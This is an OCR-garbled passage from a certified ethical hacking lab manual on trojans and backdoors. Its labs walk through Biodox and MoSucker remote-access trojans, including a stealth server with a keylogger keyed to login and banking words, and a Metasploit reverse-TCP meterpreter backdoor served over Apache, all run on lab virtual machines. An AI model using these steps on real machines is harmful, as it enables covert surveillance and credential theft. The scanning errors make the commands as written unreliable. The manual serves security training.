*fl'• fin manager commands | j | c a p tu tu r e ijj server prop»rt prop»rt1 »c
r Connection Delay —
local tools
o«l»y | 1 0
^}) contact us
|
fer
Tran sf s fer: er:[6662 [6662
mss mssrrs3 s3 2
| webcam Capture:
|6 6 6 3
|6€€4
|
|
- Install Install Pa th ------------------------
O Key :
|
Windowo
O
Temp
r Serv er Mo d eO Yordyro Yordyro Modu
:
:onrertcn
S Co n nectio nectionn H Tran sfer sfer
6561
J/D
I
6562
Saeen
6 5 63 63
S Web Cam Cam
6564
altltemfc
mssrs32e:
___ CaniButfir... __ __ c pu . IP Adress______Ussi Adress______Ussi Marcs __ Admin _____ Qpsratin... __ __ Admin Adrrinistr... WIN-EGB.. Win Vista 3D93
0.99 GB
United .
Status :dien t Active
FIGURE 9.9: Bodox open source editior
13. 13. N ow you can perform perf orm actions with die victim by selec selecting ting die appropriate action tab in die left pane of die Biodox window. 14 14.. N ow click the settings manager opdo n to view the applicat applications ions running and odie r application settings. settings. CEH L ab Manual Page 503 503
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Biodox Open Source Edition
@ 01
c ommuiicaton rS commuiicaton
Name
PID
Path
Memory ...
S I (system pr...
0
System
0
A passwords
H*J cy tttm
4
System
0
ms msn n ag s fles
j keyboard fla ms msn n settmas s ettmas 9 s e t titi n gs gs m a T ag ag y 1 a p jljl ic ic a to to n s ~ | 1A
ap ^^icato icato n setb s etb n o s £ ex3lore s e t i n g s C3 pmt ^ s e rv rv i ce ce s 0 s ys ys te te m information .$• fun manager
23smss.exe
432
System
92 9 7 9 2
Norm al
H 3 c s rs s .e x e
5 00 544
Sy ste m
5 7 0 16 32
Norm al
Sy s te m
7 4 3 0 14 4
Not riria l
H•!! wmm1 t.e>e
552
Sy ste m
4849664
Hiob
L.-J .vinlogon .vinlogon ex e
5 80
Sy ste m
62 8 7 3 60
High
)ser v ces ces.ex .ex e 1 1 )serv
628
System
7 1 88 48 0
Norm al
I Q k a s s . ex ex e
640
System
1 0088 2211 6633 2
Norm al al
5llsm.exe
648
System
48 1 2 8 00
Norm al
i y s vvcc ho ho st st .e .e x e
8 3366
Sy ste m
6418432
Normal
1 3 s v c f o s t .e x e
89 6
Sy ste m
7 19 2 5 7 6
Norm al
s v c h o s t .e x e
99 2
Sy ste m
99 6 5 5 68
Norm al
1015
Sy ste m
7 01 6 4 4 8
Norm al
244
Sy ste m
3 31 81 69 5
Norm al
296
Sy ste m
125 62432
Norm al
360
Sy ste m
120 91392
Norm al
csrss.exe
jj1 comm ands ^ c a pt pt ur ur e j se rve r pro pe roe ;
iij)ssv v ch o st.ex s t.ex e
A !oral tools
ii J d s v c .e x e
W) contact us Connection
Priority
s v c h o s t .e x e s v c h o s t .e x e
a
0 H B 0 -------- 1
□ v
1*1 !
Pxt
5 Co n nectio nectionn
6561
Transfer
6962
® Screen
6563
® Web Cam Cam
6564 ? Adress
User Narre
Com puter...
Admin Admin
Admmstr...
WIN-EGB...
True
Opera tin...
Cpu
Status : successfully ly
0.99 GB
United...
Clear Application List
FIGURE 9.9: Boclox open source editor
15. 15. You can also record die screenshots o f die victim victim by clicking clicking die Screen butt on. Capture button. 16. 16. Click die Start Screen Capture butto bu tton n to t o capture captur e screenshots screen shots o f die victim’ victim ’s machine.
FIGURE 9.10: screen capmre
17. 17. Biodox display displayss the captured screenshot screensho t o f the victim’s victim’s machine. machine.
CEH L ab Manual Page 504 504
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
V 41 41 *
*
**
Saeen Capture
V
x
Rctydean
9
'V.H51
SL B
Nr* Te*t Doarvw.txr
FIGURE 9.11: screen capture
18 18.. Similar Similarly, ly, you can ca n access die details o f die victim’ victim ’s machine by b y clicking die respective functions.
Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posmre and exposure dirough public and tree information.
P L E A S E TA L K T O Y O U R I N S T R U C T O R R E L A T E D T O T H I S L A B.
T o o l/ l/ U t il il i t y B io d o x
IF YOU HAVE QUEST IONS
I n fo fo rm rm a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed O u tp u t : Record the screenshots o f the victim machine
Internet Conn ection ection R equired □ Y es
0 No
Platform Supported 0 C l as as s ro ro o m
CE H Lab M anual Page 505 505
0 !Labs
Ethica l Ha ckin g and Cou ntenn easures Copyrigh Copyrightt © by EC-Council EC-Council AH Rights Reserved. Rep roduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Creat Creating ing a Server Serv er Using the th e MoSucker MoSucker M oSucker is a V isual isu al Basic Troja Trojan. n. M 0Snke/Js 0Snke/Js edit edit server serverprogr program am has a clie client nt )rit )rith h the the sam samee layo layout ut as suhSev suhSeven' en's clie client nt..
Lab Scenario
ICON KEY [£Z7 Valuable information______ .y v Test vour _______ _ knowledge ______ **
We b exercise exercise
W orkbook review review
A backdoo r is a secret secret or unautho rized channel fo r accessing accessing comp uter system. system. 111 an attack scenario, hackers install backdoors 011 a machine, once compromised, to access it 111 an easier manner at later times. With the growing use of e-commerce, web applications have become the target of choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways back ba ckdo do or orss can be installe ins talledd and an d to take req uired uir ed pr prev even entiv tivee steps. You are a security security administrator o f your company, and your job responsibili responsibilities ties include protecting the network from Trojans and backdoors, Trojan attacks, theft ot valuable data Jtrom the network, and identity theft.
Lab Objectives The objective of this lab lab iiss to help students learn to detect Trojan and backdo or attacks. Tlie objectives of the lab include: I T T o ol ol s demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
■
Creating a server and testing testing the netw ork for attack
■
Detecting Trojans and backdoors
■
Attacking a netw ork using sample Trojans and docum enting all all vulnerabilities and flaws detected
Lab Environment To carry tins tins out, you need: need:
MoSucker tool located at D:\CEH-T 00 ls\CEHv 8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker
A computer running Windows Server 2012 as host machine CEH L ab Manual Page 506 506
Etliical Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
■
A com puter running Window Server 8 Virtual Machine (Attacker) Windows Server 200 8
running 111 Virtual Machine (Victim)
■
A web browser with Internet access
■
Administrative Admin istrative privileges privileges to mil mi l tools
Lab Duration Time: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program diat contains malicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die file allocation table on a hard drive. The versions of die created client or host and appearance of die website may differ from what it is in die lab, but die actual process of creating die server and die client is same as shown 111 diis lab. Note:
Lab Task Task s 3
t a s k 11. Launch Laun ch Windows Window s 8 Virtual Machine and navigate navigate to Z:\CEHv8 Module 06
_ Create Server with ProRat 2.
Trojans and Backd oors\Tro jans Types\GUI Types\GUI Trojans\MoSucker.
Double-click die CreateServer.exe file to create a server. F
- p
MoSucker
Applicator Tools Tools
i
Home
|
Sh
View Trcjans Types
* _ -< Favorites Desktop f t D o w n l oa oa d s '2Al Recent place}
Manage ►
GUI GUI Trojans ►
“
© MoSuckcr
V | < | | Scorch MoSuckcr
fi
|
J! AY Firewa Firewall ll e/en ts Jtcgi Jl. pi jg ns j . r unti mK screenshots
04 Libraries Q
D o c um um e n ts ts
^ Music M
P i ct ct ur ur e s
Qj Vid»oc lOiterrc
J i slons j . st ub | ^Cfea?eServer.exe | MjSjcLcr exe j_] R eadM e.tx t
1 it*m cel»rt#d 456 K2
FIGURE 10.1: Install createServer.exe
3. 11 111 the th e Open File - S ecu rity Warning click Run. Warning dialog box, click
CEH L ab Manual Page 507 507
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Open File Security Warning The publisher could could no nott be v e erified. rified. Are you sure you want to ru run n this software? Name:
S3
...Trojans Types\GUI Trojans\MoS ucker\CreateServer.exe
Publisher
Unkn own P Publisher ublisher
Type:
Application
From:
Z:\CEHv8 Mod ule 06 Trojans Trojans and BackdoorsVTrojans BackdoorsVTrojans T... T...
Run
Cancel
This file does n ot have a valid dig ital signature that verifies its publisher. publisher. You sh ould only run software from publishers you trust. trust. How can I decide what software software to run? run?
FIGURE 10.2: Install createServer.exe
£ / T oo oo ls ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
4. The MoSncker Server Creator/Editor window appears, leave die default settings and click OK. OK. MoSucker 3.0 Server Creator/Editor Coded by Superchachi. Contains code from Mosucker 2.2 by Krusty Compiled for Public release B on November 20/2002, VB6 (•
m
I want to create a stealth trojan server for a victim I-
CD
Indude Msvbvm60.dll in in your MoSucker MoSucker server (adds 750 KB) KB)
17 I ndude mswinsock.o cx in your server (adds 50 KB) 17 Pack for minimal file size
Recommended!
CD CD
MoSudcer MoSudcer Transport Cipher Key TWQPQJL25873IVFCSJQK13761 V Add
(
|
2385
KB to the serv er.
I want to create a visible server for local testing. I want to edit an existing server
17
Start configuration after creating creating the server
About
Cancel
Ok
FIGURE 10.3: Install createServer.exe
5. Use die file file name server.exe and to save it 111 die same directory, click Save.
CEH L ab Manual Page 508 508
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
&
MoSucker Server Creator.
©
^
0 Organize w 0
[
«
GU GU I T r o ja ja n s ►
M o S u c ke ke r
Search MoSucker
New folder
*
D o c um um e n ts ts
J 1 Music
Name i.
Pictures
8 Videos
A V Fi Fi r e wa wa l l e v e n t s
Date modified
Type
9/19/2012 1:37 PM
File foldei
Xcgi
9/19/20121:37 PM
F i le le f o l d e i
J
plugins
9/19/2012 1:37 PM
File foldei
X
r u nt nt im im e s
9/19/20121:37 PM
File folde i
J.
s c r e e n s h o ts ts
10/1/2012 6:56 PM
F i le le f o l d e i
9/19/2012 1:37 PM
File folde i
Homegroup
X- skins :
Computer J ^ V
^
L o ca ca l D is is k ( C )
stub
File folde i
11/28/2002 2:59 AM
Applicatia
jg | M 0 Sucker.exe
1 1 / 2 2 / 2 0 0 2 5 : 1 0 PM PM
Applicatifl
C E H -T -T o ol ol s ( \ \1 \1 0 .
N et et wo wo rk rk
File QameJ Save as typ e
“
10/1/2012 6:50 PM
J p CreateServer.exe
5 E x e c u t a b l e F i l e s ( * . ex ex e )
Save
Hide Folders
Cancel
FIGURE 10.4: Save Server.exe
6. MoSucker will will generate a server with the com plete settings settings in die default directory. MoSucker 3.0
G e n e r a t i n g s e r v e r ... 100% complete Build Date: Build Build Info:
11/28/2002 2:04:12 AM MoSucker 3.0 Public Release B
L e v e l A c c e s s e d : Public UPX Verifying necessary filepaths Preparing first stub Preparing second stub Packing first stub Packing second stub Modifying file headers
FIGURE FIGU RE 10 10.5: .5: Install server progress
7. Click OK 111 die Edit Server pop-u po p-u p message. Edit Server 3.0 Server created succe ssfully! Server size: 158 KB. D o n o t r e p a c k s e rv rv e r .
OK
FIGURE 10.6: Server created successful
111 the MoSucker Mo Sucker wizard, change chan ge die VictinVs Name to Victim or leave all the settings as dieir defaults.
CEH L ab Manual Page 509 509
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
MoSucker 3.0 Selected Server: |2:VCEH |2:VCEHv8 v8 Modde 06 Trojans and Backdoors\Trojans Type [
NameA’ort Password
Server ID: Cypher Key:
[
Notificatio n 1
Victim's Victim's Name:
f
Notification 2
Server Name(s):
Options
Extension(s): Conrectior-Bort:
J
Close
0
1501704QWEYJC:4264200TPGND 4264200TPGNDEVC EVC TWQPCUL25873IVFCSJQK13761 TWQPCUL25873IVFCSJQ K13761 |vict!m
~]
0
kernel32,mscOnfig,winexec32, netconfig exe,pif,bat,dliope,com,bpq,xtr,txp, 142381
I * Prevent same same server multi-infections (recommended) (recommended)
You may select a windows icon to associate with your custom file extension/s.
Fake Error File Properties
Read
Save
FIGURE 10.7: Give die victim machine details
9. No w click click Keylogger 111 die left pane, and check die Enable off-line keylogger opdon, and dien click Save. 10 10.. Leave die rest o f die settings as dieir defaults. MoSucker 3.0 Selected Server: Name/Port Password
|z:\:\CEHv8Module 06 Trojans and Backdoors\Trojans Type P I !Enable !Enable off-line keyioggetj
[
C~\ Close
[T]
Log Filename: monitor.kig
Options
1 Enable Smart Logging Logging Captwn key words to trigger keylogger (separate each with a comma) hotmad,yahoo',login password,bankfsecurefcheckoutfregister,
Keylogger Plu g-n s^<11 Fake Error Fde Properties
Read
Save
FIGURE 10.8: Enable the keylogger
11. Click OK 111 die EditServer pop-up message. MoSucker EditServer 3.0
o
Server saved successfully. Final server size: 158 KB
OK
FIGURE FIGU RE 10 10.9: .9: Server save file file
CEH Lab Manual Page 51 510
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
12. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module
06
Trojans\MoSucker to
run die server.exe hie. 2 ^ Si H I
3 Pit
Edl
Vtew tew *
~odi
Trojans
and
BackdoorsVTrojans
-Jpj*1
•tep •tep
Virnt
i AVFrmsI AVFrmsI e\en3 e\en3
£ Pitres
©
*
■»-» - H Ii*co
favorite Links
Types\GUI
I- ■■°■
1• Ml *
v
|
^ae
4. 1•
.1 — * ^viSvcce'.sxe
__ _ l _ ^
____________ ________ ________ _______ ___ I ^ ________ FIGURE FIGUR E 10.10: click server.exe
13. Double-click server.exe in Windows Server 2008 virtual machine, and click Run 111 die Open File - Se cur ity Warning Warning dialog box. x 11
Open File File - Security Warn ing The publisher could not be verif ied. Are you sure you want to run this software? Name: Publisher: Type:
.. .s\T 1rojans r ojans Types\GUI TrojansV 'loSucker'!server.exe 'loSucker'!server.exe U n k n o w n P u b l i s h er er Application
From: Z: \CEHv8 Module 06 Trojans and Backd oors\T 1rojan... r ojan...
Run
. f!
Cancel
This file does not have a valid digital digital signature that verifies its its publisher. You should only run software from publishers you trust. How can I decide what software to run
FIGURE FIGURE 10.11: Click on Run
14. 14. Now No w switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and BackdoorsVTr BackdoorsVTrojans ojans Types\GUI Types\GUI Trojans\Mo Sucker
to launch MoSucker.exe. 15. Double-cl 1ckMoSucker.exe.
CEH Lab Manual Page 51 511
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
K
1
] © )
* (
Ib m c
Share
t l i i
*
View jnj Typca
Manage ►
GUITro janj
AY Frewa 1e/en ts
-{ Favorite K
MoSucker
Applicator t o o k
W
11
MoSucke r
v
C
fi |
| Scorc h M oSuckc r
-J! 5erver.exe
M c9
D e sk sk t op op
J
6 Downloads
pljg ns
1 runtime
ffil Rcccnt Rcccnt plot o
£ ^
^gi Libraries
s c re re t ns ns h oc oc s s l o ns ns stub
H] Documents
$ C rea:eServer.exe
Music [KJ Pictures
^ M o S u d e rp rp e ]
!HI Videos
j | Re adM e.M
11 items
►
1 item selerted 3.08 MB
£
5,
FIGURE FIGUR E 10 10.12: .12: click on Mosuker.exe Mosuker.exe
16. 16. 111 tlie O pe n File —Security —Security Warn Wa rning ing dialog dialo g box, click Run to launch MoSucker. Open File - Security Warning The publisher could not be verified. Are you sure you want want to run this software? Name:
S3
...rs\Tr ...rs\Trojan ojanss Types\GUI Types\GUI Trojans\MoSucker\MoSucker.exe Trojans\MoSucker\MoSucker.exe
Publisher:
Unknown Publisher
Type:
Application
From:
Z:\CEHv8 Modu le 06 Trojans and Backdoors\Trojans T.. T....
Run
Cancel
This file does n ot have a valid dig ital signature that verifies its publisher. publisher. You sh ould only run software from publishers you trust. trust. How can I decide what software software to run? run?
FIGURE 10.13: Run the applicatin
17. 17. Tlie MoSucker main window appears, as shown 111 die following figure.
10.0.012
][10005
Misc stuff Infotmation File related System
J
Spy related Fun stuff I Fun stuff II Live capture
u i iu i u u i .m .m o s u c h c r . t K
*
0G
FIGURE FIGU RE 10 10.14 .14:: Mosucher main window
CEH Lab Manual Page 51 512
Etliical Ha ckin g and Cou ntenn easure s Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
18. Enter the IP address of die victim victim and port numb er as you noted at die time o f server configuration, and dien die n click Connect. 19 19.. 111 diis lab, we have noted not ed Windows Win dows Server 2008 virtual machine’ machin e’ss IP address (10.0.0.13) and port number: 4288. Note:
These might differ 111 your classroom labs.
FIGURE 10.15: connect to victim machine
20. Now die Connect butto bu tton n automatically auto matically turns to Disconnect after getting connected widi die victim machine as shown 111 the following screenshot.
version 3.0
FIGURE 10.16: connection established
21. Now click Misc stuff 111 die left pane, which shows different options from which an attacker can use to perform perf orm actions from liis or her system. system.
CEH Lab Manual Page 51 513
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
' About
_
|
I& T o o ls ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
FIGURE FIGU RE 10 10.17 .17:: setting setti ng server options
22. You Yo u can also access the victim’ victim ’s machine remotely remo tely by clicking clicking Live Live cap ture in the left pane. 23. 111the Live optio n click Start, which will will open the remote desktop Live captur e option of a victim’s machine. About'
| 4288 11 11 Disconnect 11 Options Options ] s g JI&
Misc stuff
_
~x]
Q
make screenshot
Information File related System Spy related
Make screenshot JPEG Quality:
Fun stuff I
*
Fun stuff II
• 30% • 40% • 50%
Live capture Start Settings
20%
•
60%
•
70%
•
80%
O 90%
& oi£ FIGURE 10.18: start capturing
24. 24. The remote re mote desk top connection conne ction ot die victim’s victim’s machine is shown show n 111 die following tigiire. tigiire.
CEH L ab Manual Page 514 514
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Remote administration mode
^iaijol
sssei sssa&i RA mode options Resi 2 e windo-v to 4:3 JPG Qu Quality 1 Delay in ms |
' 1000
W Send mouseclicks W Send pressed keys Send mousemoves
U
W Autollpdate pics V Fullscreen
FIGURE FIGU RE 10 10.19 .19:: capturing capturi ng victim machine
25. You Yo u can access tiles, tiles, modify modif y die files, files, and so on in diis mode. *
Rem10 te administration mode
w
r \
*>
RA mode options Resize z e window to 4:3 1 JPG Quality 190% Delay Delay in ms |
▼ j
1 !
I j
1000 1000
W Send mouseclcks W Send pressed Leys 1“
* ?
^
______
:Tnt-.aocw
Send mausemoves
W Autollpdate pics
E1K«
Cfc *
Fullscrccp
J
&
Z
Z
-----------
Crcre:5FHB
**o
I,i h
—
® 1• M 1
o;
FIGURE 10.20: capturing victim machine
26. Similar Similarly, ly, you can ca n access die details o f die victim’ victim ’s machine by b y clicking die respective functions.
Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s securi security ty posUire posUire and exposure throu gh public and an d free information. information.
CEH Lab Manual Page 51 515
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
P L E A S E TA T A L K T O YO YO U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S RELATED TO THIS LAB.
T o o l/ l/ U t il il i t y M osuck er
I nf nf or or m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed O u tp u t : Record the screenshots of the victim’s victim’s machine
Questions 1. Evaluate and examine various methods to t o conn connect ect to victims victims if they are 111 different cities or countries. □ Y es
0 No
Platform Supported 0 C la l a ss ss rro o om om
CEH Lab Manual Page 51 516
0 iLabs Labs
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Hack Window Windows s 7 Using Using Metas Metas p loit Metasp/o Metasp/oit itFram Framee// ork is a tool for for devel develop opiing and exec execut utin ing g exploit exploit code again against st a remote target machine.
Lab Scenario
ICON KEY Z^7 Valuable [ information ______ . * Test your _______ _ knowledge ______ e
W eb exercise *
Q Workbook revi review ew £
Large companies are comm on targets targets for hackers and attackers attackers o f various kinds and it is is no t unco mm on for these companies to be acti activel vely y monitoring traffic traffic to and from their critical IT mfrastnicture. Based 011 the functionality of the Trojan we can safely safely surmise surmise that the intent o f the Trojan is to open a backdoor 011 a com promised compu ter, allowing allowing a remote attacker to mo nitor activity activity and steal information from the compromised computer. Once installed inside a corporate network, the backdoor feamre of the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, meaning that the wealth of liitormation that may be stolen could potentially be far greater than that existing 011 a single machine. A basic principle with all malicious programs is that they need user support to do the damage to a computer. That is the reason why Trojan horses try to deceive users by showing them some other form of email. Backdoor programs are used to gam unauthorized access to systems and ba ckdo ck do or softw sof tware are is used us ed by hacker hac kerss to gain access to systems syst ems so tha t they the y can send 111 the malicious software to that particular system. Successful attacks by the hacker 01 attacker infecting the target environment with a customized Trojan horse (backdoor) determines exploitable holes 111 the current security system. You are a security administrator of your company, and your job responsibilities include include protecting the network fro m Trojans and backdoors, Tro jan attacks, attacks, theft o f valuab valuable le data from the network, and identity theft. theft.
& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
CEH Lab Manual Page 51 517
Lab Objectives The objective objective of tins tins lab is is to help students learn to detect Trojan and backdo or attacks. The objectives of the lab include: ■
Creating a server and testing the netw ork for attack
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
■
Attacking a netw ork using sample back doo r and monito r the system activity
Lab Environment To cany diis out, you need: ■
A compu ter running Window Server 2012 BackTrack 5 r3 running in Virtual machine
running 111 virtual machine (Victim machine)
Windows7
■
A web browser with Internet access
■
Administrative Admin istrative privileges privileges to mil mi l tools
Lab Duration Tune: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as mining die hie allocation table on a hard drive.
Lab Task Task s sd
T A S K
1
Create Sever Connection
1.
Start BackTrack 5 virUial machine.
2. O pen the terminal console by navigating to A p p li li ca ca t io io n ^ B a c k T r ac ac k ^ Exploitation Tools Framework
^ Network Exploitation Tools
^ msfconsole
,y Applications Places System | Accessories ^
B a c kl kl t dc dc k
,f
G r ap ap h ic ic *
LI UC O c t 2 3 1 0 : 0 3
AM
:
>*! Gathering
V u l n e ra ra b i li li t y A s s e s s m e n t
■0 E xploitation Ibols
In te r n et ►
^
O th e r
!^
Sound & Video
f l f S y s t e m T oo ls
► ►
^
a
W in e
Access
^
?
»
R e v e r se E n g in ee nn g
»
R FID T o o l s
►
.K
N e t w o r k E x p l o it it a t i on on Tb Tb o ls ls
/<§>
Explo itatio n Tools
^
^
Stress Testina Testina
r f - Forensics
j P
►
P n v i l e g e E s c al al a t io io n
B \ Maintaining
^
5
d
►
i l l O f f ic ic e
Open your terminal terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for diis tooL
^ Metasploit
>!. Cisco Attacks ►
.1 . FasMVack
D at a t a ba ba se se Expl• ^
a rm rm it it ag ag e
iH
W i r e l e s s E x p lo ^
m sfd i
i f - . S AP E x p l o i t a t i o n
S o c ia l E n g m e e ^
m sfc o n s o le
^
P hy hy si si cca a l E xp xp lo lo ^
m s fu fu pd pd at at e
»
is r -e v il g r a d e n et et oe oe ar ar -t -t el el ne ne te te na na bl bl e termineter
O p e n S o u r c e E 3b. start msfpro
►
Me M e ta ta sp sp lo lo it it F ra ra me me wo wo r k
V
R e po po r ti ti n g T o ol ol s Services M i s c e ll ll a n e ou ou s
<<
*
m
_
back track
—
,
[Create Simple Exploit...
CE H Lab M anual Page 518 518
Ethica l Ha ckin g and Cou ntenn easures Copyrigh Copyrightt © by EC-Council EC-Council AH Rights Reserved. Rep roduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
FIGURE 11.1: Selecting msfconsole from metasploit Framework
3. Type the following com man d 111 msfconsole: msfpayload wind ows/m eterpreter/reverse tcp LHOST=10.0.0. LHOST=10.0.0.6 6 X> D e s k t o p / B a c k d o o r . e x e and pre ss Enter
This IP address (10.0.0.6) is BackTrack machines. These IP addresses may vary in in your lab environment. Note:
I I
BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection
File Action Media Clipboard View Help
« 3 ®S 0
II 1►fe
1
Applications Places system
Cj
! S 3 T U e 0 C t 2 3 . 3 :3 :3 2 P M
I File Edit View Term inal H elp
3K0a 3K0a SuperHack II
Logon Logon
xracK
-
» [ m e t a s p l o i t v 4 . s. s. 0 - d e v [ c o r c : 4 b a p t : 1 . 0 ] 927 ]= e x p l o i t s • 4 99 99 a u x i l i a r y - 1 51 51 p o s t 2 5 1 ] = p a y l o a d s • 2 8 e n c o d e r s - 8 nops
; > jnsfpayload win dow s/neterpr eter/reve rse
y
t c p L H O S T - 1 O . 0 .0 .0 . 6 X > D e s k t o p / B a c kd kd o o r
FIGURE 11.2: CreatdngBackdoor.exe
Metasploit Framework, a tool for developing and executing exploit code against a remote target machine
4. Tins com man d will create a W i n d o w s e x e c u t a b l e f i l e with name the B a c k d o o r . e x e and it will be saved on the BackTrack 5 desktop. ----------------------J File Action
Media
Clipboard
V!* *
BackTrack BackTrack on W1N-D39MRSHL9E4 W1N-D39MRSHL9E4 - Virtual Virtual Machine Connection
Help
it 0 ® @g ! it fe ^
Applications cations Places aces System System
U
1ue OCt 23. 11 11: 5 53 3 AM
A
Backdoor.exe
<< back I track ,Vi
ja j a a j FIGURE 11.3: Created Backdoor.exe file
5. No w you need to share B a c k d o o r . e x e with your victim machine (Windows 7), by following these steps: CEH Lab Manual Page 51 519
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
6.
O pen a new BackTrack 5 terminal (CTRL+ALT+T) and then nan this command mkdir /var/www/share and press Enter to create a new director} share.
To create new directory share following command is usedmkdir / var/www/ share share
FIGURE 11.4: sharing the file
7. Change the mode fo r the the share folder folder to to 755, 755, by entering the comm and chmod -R 755 /var/www /var/www /share/ and then press Enter T=TB"■ BackTrack BackTrack on W1N-D39MRSHL9E4 W1N-D39MRSHL9E4 - Virtual Virtual Mach ine Con nection
File Action Media Clipboard View Help
<910 (■ ) @ O II It fe
,
d
A p p l i c a ti ti o n s P l a c e s S y s t e m
FT ■RieOct 23 . 12:03 Pf/
.f t
Backdoor.exe
•*> File
1-.
root^bt: — Edit
^o ot$>i ot$>i
View
Terminal
Help
ra*
-k c h a o d • R 7S 7S 5 / v a r / * w w / s h a r e / |
I
change die mode of m To change share folder use the following comma11d:chmod -R * /var/www/ share/ share/
<< back I track £ ai FIGURE 11.5: sharing the file into 755
8. Change the ownership of that folder folder int into o www-data, by entering the the command chow n -R ww w-data:ww w-data /var/www/share/ and then press pre ss Enter.
CEH L ab Manual Page 520 520
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection
Fil•
Action Action
Mid i•
Clipboard
Mw
Hilp
It > ® @ 0 II It >» d I
Applications cations Places Places system (* ]
'
v
k
RJ Coct 23. 12:0 PM
root^bt:
ile Edit View Terminal Help
otgfet: * nkdi r / var/ www/ share -2 i.llL .
■■ TT;
ot'jbt:-♦ ot'jbt:-♦ cnow cnown n •R ^>
.
i
dara:v.w data data /yar/w //sftr>r c/ \
To ch an ge ownership of folder into www, use this this command chown -R www data /var /v ar /w w w/ sh ar e/
< <
back I t r ack ac k 5 FIGURE 11.6: Change the ownership of the folder
9. Type the comm and Is -la /var/www/ | grep share and then th en pres ress Enter BackTrack BackTrack on W1N-D39MR5HL9E4 - Virtual Machine Connection
'-!° *
File Action Media Clipboard View Help
U
3 ® S> 0
I I I t ff ffe
d [> -< : 1ueOCt 23.1 23. 1
Applications Places system (>
s
v
x
ro ro o tt^^ b t -
Tile Edit View Terminal Help
root^bt:-* nkdir /var/ww/share rootgbt:-# chaod -R 755 /var/wvw/share/ c ho ho w r - R w » d a t a : w u w d a t a / y a r / w w / s t m r e / 'c -~ roct^bt:-» Is -Id /varA**t/ | grep share|
<< back I track 5 -0 3 FIGURE 11 11.7: .7: sharing die Backdoor.exe file
10. The next step is to start the A p a c h e s e r v e r by typ typing ing the s e r v i c e a p a c h e 2 s t a r t command 111 the terminal, and then press Enter.
CEH Lab Manual Page 52 521
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection
Fil•
Action Action
Mid i•
It > ® @ 0
CI 1pbo»rd
